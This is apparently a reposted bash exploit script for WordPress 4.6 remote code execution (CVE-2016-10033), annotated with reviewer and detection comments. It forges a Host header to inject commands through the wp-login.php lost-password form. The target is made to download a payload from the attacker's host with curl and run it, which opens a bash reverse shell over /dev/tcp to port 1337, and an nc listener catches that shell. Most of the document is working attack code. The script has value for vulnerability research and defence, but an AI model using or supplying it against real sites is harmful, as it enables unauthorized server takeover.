GLADzTeguhID

WordPress 4.6 - Remote Code Execution (RCE) Exploit

May 9th, 2017
  1. #!/bin/bash
  2. #
  3. # __ __ __ __ __
  4. # / / ___ ____ _____ _/ / / / / /___ ______/ /_____ __________
  5. # / / / _ \/ __ `/ __ `/ / / /_/ / __ `/ ___/ //_/ _ \/ ___/ ___/
  6. # / /___/ __/ /_/ / /_/ / / / __ / /_/ / /__/ ,< / __/ / (__ )
  7. # /_____/\___/\__, /\__,_/_/ /_/ /_/\__,_/\___/_/|_|\___/_/ /____/
  8. # /____/
  9. #
  10. #
  11. # WordPress 4.6 - Remote Code Execution (RCE) PoC Exploit
  12. # CVE-2016-10033
  13. #
  14. # wordpress-rce-exploit.sh (ver. 1.0)
  15. #
  16. #
  17. # Discovered and coded by
  18. #
  19. # Dawid Golunski (@dawid_golunski)
  20. # https://legalhackers.com
  21. #
  22. # ExploitBox project:
  23. # https://ExploitBox.io
  24. #
  25. # Full advisory URL:
  26. # https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html
  27. #
  28. # Exploit src URL:
  29. # https://exploitbox.io/exploit/wordpress-rce-exploit.sh
  30. #
  31. #
  32. # Tested on WordPress 4.6:
  33. # https://github.com/WordPress/WordPress/archive/4.6.zip
  34. #
  35. # Usage:
  36. # ./wordpress-rce-exploit.sh target-wordpress-url
  37. #
  38. #
  39. # Disclaimer:
  40. # For testing purposes only
  41. #
  42. #
  43. # -----------------------------------------------------------------
  44. #
  45. # Interested in vulns/exploitation?
  46. #
  47. #
  48. # .;lc'
  49. # .,cdkkOOOko;.
  50. # .,lxxkkkkOOOO000Ol'
  51. # .':oxxxxxkkkkOOOO0000KK0x:'
  52. # .;ldxxxxxxxxkxl,.'lk0000KKKXXXKd;.
  53. # ':oxxxxxxxxxxo;. .:oOKKKXXXNNNNOl.
  54. # '';ldxxxxxdc,. ,oOXXXNNNXd;,.
  55. # .ddc;,,:c;. ,c: .cxxc:;:ox:
  56. # .dxxxxo, ., ,kMMM0:. ., .lxxxxx:
  57. # .dxxxxxc lW. oMMMMMMMK d0 .xxxxxx:
  58. # .dxxxxxc .0k.,KWMMMWNo :X: .xxxxxx:
  59. # .dxxxxxc .xN0xxxxxxxkXK, .xxxxxx:
  60. # .dxxxxxc lddOMMMMWd0MMMMKddd. .xxxxxx:
  61. # .dxxxxxc .cNMMMN.oMMMMx' .xxxxxx:
  62. # .dxxxxxc lKo;dNMN.oMM0;:Ok. 'xxxxxx:
  63. # .dxxxxxc ;Mc .lx.:o, Kl 'xxxxxx:
  64. # .dxxxxxdl;. ., .. .;cdxxxxxx:
  65. # .dxxxxxxxxxdc,. 'cdkkxxxxxxxx:
  66. # .':oxxxxxxxxxdl;. .;lxkkkkkxxxxdc,.
  67. # .;ldxxxxxxxxxdc, .cxkkkkkkkkkxd:.
  68. # .':oxxxxxxxxx.ckkkkkkkkxl,.
  69. # .,cdxxxxx.ckkkkkxc.
  70. # .':odx.ckxl,.
  71. # .,.'.
  72. #
  73. # https://ExploitBox.io
  74. #
  75. # https://twitter.com/Exploit_Box
  76. #
  77. # -----------------------------------------------------------------
  78.  
  79.  
  80.  
  81. rev_host="192.168.57.1"
  82.  
#######################################
# Builds the value of the HTTP Host header that the two curl calls in the
# main block send to wp-login.php.
# Globals:   host_header (written); cmd, rce_cmd (written, NOT local, so
#            the caller's `cmd` is overwritten — same value here, so
#            harmless, but easy to trip over on reuse)
# Arguments: $1 - command string to embed
# Outputs:   nothing on stdout
# Returns:   always 0
#######################################
function prep_host_header() {
cmd="$1"
# Wrap the command in a ${run{...}} item. The variable names used below
# ($spool_directory, $tod_log) look like mail-transport string-expansion
# variables — presumably Exim; verify against the linked advisory.
rce_cmd="\${run{$cmd}}";

# replace / with ${substr{0}{1}{$spool_directory}}
#sed 's^/^${substr{0}{1}{$spool_directory}}^g'
# NOTE(review): `echo $rce_cmd` is unquoted inside backticks, so the
# command string is word-split and glob-expanded before sed sees it.
rce_cmd="`echo $rce_cmd | sed 's^/^\${substr{0}{1}{\$spool_directory}}^g'`"

# replace ' ' (space) with ${substr{10}{1}{$tod_log}}
#sed 's^ ^${substr{10}{1}{$tod_log}}$^g'
rce_cmd="`echo $rce_cmd | sed 's^ ^\${substr{10}{1}{\$tod_log}}^g'`"
#return "target(any -froot@localhost -be $rce_cmd null)"
# Final header value (a global, since bash functions cannot return strings
# via `return`). Detection note: a Host header containing `-be`, `${run{`
# or `${substr{` is a strong indicator of this technique in web/WAF logs.
host_header="target(any -froot@localhost -be $rce_cmd null)"
return 0
}
  98.  
  99.  
  100. #cat exploitbox.ans
# Base64-encoded ANSI banner art; decoded and printed below, nothing else
# reads these two variables.
intro="
DQobWzBtIBtbMjFDG1sxOzM0bSAgICAuO2xjJw0KG1swbSAbWzIxQxtbMTszNG0uLGNka2tPT09r
bzsuDQobWzBtICAgX19fX19fXxtbOEMbWzE7MzRtLiwgG1swbV9fX19fX19fG1s1Q19fX19fX19f
G1s2Q19fX19fX18NCiAgIFwgIF9fXy9fIF9fX18gG1sxOzM0bScbWzBtX19fXBtbNkMvX19fX19c
G1s2Q19fX19fX19cXyAgIF8vXw0KICAgLyAgXy8gICBcXCAgIFwvICAgLyAgIF9fLxtbNUMvLyAg
IHwgIFxfX19fXy8vG1s3Q1wNCiAgL19fX19fX19fXz4+G1s2QzwgX18vICAvICAgIC8tXCBfX19f
IC8bWzVDXCBfX19fX19fLw0KIBtbMTFDPF9fXy9cX19fPiAgICAvX19fX19fX18vICAgIC9fX19f
X19fPg0KIBtbNkMbWzE7MzRtLmRkYzssLDpjOy4bWzlDG1swbSxjOhtbOUMbWzM0bS5jeHhjOjs6
b3g6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eG8sG1s1QxtbMG0uLCAgICxrTU1NMDouICAuLBtb
NUMbWzM0bS5seHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s1QxtbMG1sVy4gb01N
TU1NTU1LICBkMBtbNUMbWzM0bS54eHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s1
QxtbMG0uMGsuLEtXTU1NV05vIDpYOhtbNUMbWzM0bS54eHh4eHg6DQobWzM3bSAbWzZDLhtbMTsz
NG1keHh4eHhjG1s2QxtbMG0ueE4weHh4eHh4eGtYSywbWzZDG1szNG0ueHh4eHh4Og0KG1szN20g
G1s2Qy4bWzE7MzRtZHh4eHh4YyAgICAbWzBtbGRkT01NTU1XZDBNTU1NS2RkZC4gICAbWzM0bS54
eHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s2QxtbMG0uY05NTU1OLm9NTU1NeCcb
WzZDG1szNG0ueHh4eHh4Og0KG1szN20gG1s2QxtbMTszNG0uZHh4eHh4YxtbNUMbWzBtbEtvO2RO
TU4ub01NMDs6T2suICAgIBtbMzRtJ3h4eHh4eDoNChtbMzdtIBtbNkMbWzE7MzRtLmR4eHh4eGMg
ICAgG1swbTtNYyAgIC5seC46bywgICAgS2wgICAgG1szNG0neHh4eHh4Og0KG1szN20gG1s2Qxtb
MTszNG0uZHh4eHh4ZGw7LiAuLBtbMTVDG1swOzM0bS4uIC47Y2R4eHh4eHg6DQobWzM3bSAbWzZD
G1sxOzM0bS5keHh4eCAbWzBtX19fX19fX18bWzEwQ19fX18gIF9fX19fIBtbMzRteHh4eHg6DQob
WzM3bSAbWzdDG1sxOzM0bS4nOm94IBtbMG1cG1s2Qy9fIF9fX19fX19fXCAgIFwvICAgIC8gG1sz
NG14eGMsLg0KG1szN20gG1sxMUMbWzE7MzRtLiAbWzBtLxtbNUMvICBcXBtbOEM+G1s3QzwgIBtb
MzRteCwNChtbMzdtIBtbMTJDLxtbMTBDLyAgIHwgICAvICAgL1wgICAgXA0KIBtbMTJDXF9fX19f
X19fXzxfX19fX19fPF9fX18+IFxfX19fPg0KIBtbMjFDG1sxOzM0bS4nOm9keC4bWzA7MzRtY2t4
bCwuDQobWzM3bSAbWzI1QxtbMTszNG0uLC4bWzA7MzRtJy4NChtbMzdtIA0K"
intro2="
ICAgICAgICAgICAgICAgICAgIBtbNDRtfCBFeHBsb2l0Qm94LmlvIHwbWzBtCgobWzk0bSsgLS09
fBtbMG0gG1s5MW1Xb3JkcHJlc3MgQ29yZSAtIFVuYXV0aGVudGljYXRlZCBSQ0UgRXhwbG9pdBtb
MG0gIBtbOTRtfBtbMG0KG1s5NG0rIC0tPXwbWzBtICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAbWzk0bXwbWzBtChtbOTRtKyAtLT18G1swbSAgICAgICAgICBE
aXNjb3ZlcmVkICYgQ29kZWQgQnkgICAgICAgICAgICAgICAgG1s5NG18G1swbQobWzk0bSsgLS09
fBtbMG0gICAgICAgICAgICAgICAbWzk0bURhd2lkIEdvbHVuc2tpG1swbSAgICAgICAgICAgICAg
ICAgIBtbOTRtfBtbMG0gChtbOTRtKyAtLT18G1swbSAgICAgICAgIBtbOTRtaHR0cHM6Ly9sZWdh
bGhhY2tlcnMuY29tG1swbSAgICAgICAgICAgICAgG1s5NG18G1swbSAKG1s5NG0rIC0tPXwbWzBt
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAbWzk0bXwbWzBt
ChtbOTRtKyAtLT18G1swbSAiV2l0aCBHcmVhdCBQb3dlciBDb21lcyBHcmVhdCBSZXNwb25zaWJp
bGl0eSIgG1s5NG18G1swbSAKG1s5NG0rIC0tPXwbWzBtICAgICAgICAqIEZvciB0ZXN0aW5nIHB1
cnBvc2VzIG9ubHkgKiAgICAgICAgICAbWzk0bXwbWzBtIAoKCg=="
echo "$intro" | base64 -d
echo "$intro2" | base64 -d

# Exactly one argument (the target URL) is required; $target is used
# unquoted in the curl calls below, so a URL with spaces or glob chars
# would be split.
if [ "$#" -ne 1 ]; then
echo -e "Usage:\n$0 target-wordpress-url\n"
exit 1
fi
target="$1"
echo -ne "\e[91m[*]\033[0m"
# Interactive confirmation; anything other than a literal "y" takes the
# else-branch and exits. `read` without -r interprets backslashes.
read -p " Sure you want to get a shell on the target '$target' ? [y/N] " choice
echo


if [ "$choice" == "y" ]; then

echo -e "\e[92m[*]\033[0m Guess I can't argue with that... Let's get started...\n"
# NOTE(review): printed unconditionally — nothing has contacted the target
# at this point, so "Connected" is not a verified state.
echo -e "\e[92m[+]\033[0m Connected to the target"

# Serve payload/bash script on :80
# The served file is a one-line bash reverse shell to $rev_host:1337.
# Observable footprint on the victim side: an outbound HTTP GET for
# /rce.txt to $rev_host:80, then an outbound TCP connection to port 1337.
RCE_exec_cmd="(sleep 3s && nohup bash -i >/dev/tcp/$rev_host/1337 0<&1 2>&1) &"
echo "$RCE_exec_cmd" > rce.txt
# Python 2 module (SimpleHTTPServer); port 80 needs root. Serves the
# current working directory, not just rce.txt.
python -mSimpleHTTPServer 80 2>/dev/null >&2 &
# NOTE(review): hpid is captured but never used — the HTTP server is
# never killed and outlives the script.
hpid=$!

# Save payload on the target in /tmp/rce
# First request: the Host header (built by prep_host_header) carries a
# curl command that fetches rce.txt from $rev_host.
cmd="/usr/bin/curl -o/tmp/rce $rev_host/rce.txt"
prep_host_header "$cmd"
# POST to the lost-password form; the Host header is the injection
# carrier. Exit status of curl is not checked, so "sent successfully"
# below is printed regardless of outcome.
curl -H"Host: $host_header" -s -d 'user_login=admin&wp-submit=Get+New+Password' $target/wp-login.php?action=lostpassword
echo -e "\n\e[92m[+]\e[0m Payload sent successfully"

# Execute payload (RCE_exec_cmd) on the target /bin/bash /tmp/rce
cmd="/bin/bash /tmp/rce"
prep_host_header "$cmd"
# Backgrounded so the listener below can be started while the request
# is still in flight; again no status check.
curl -H"Host: $host_header" -d 'user_login=admin&wp-submit=Get+New+Password' $target/wp-login.php?action=lostpassword &
echo -e "\n\e[92m[+]\033[0m Payload executed!"

echo -e "\n\e[92m[*]\033[0m Waiting for the target to send us a \e[94mreverse shell\e[0m...\n"
# Blocks until a connection arrives on 1337 (or nc is interrupted).
nc -vv -l 1337
echo
else
echo -e "\e[92m[+]\033[0m Responsible choice ;) Exiting.\n"
exit 0

fi


echo "Exiting..."
exit 0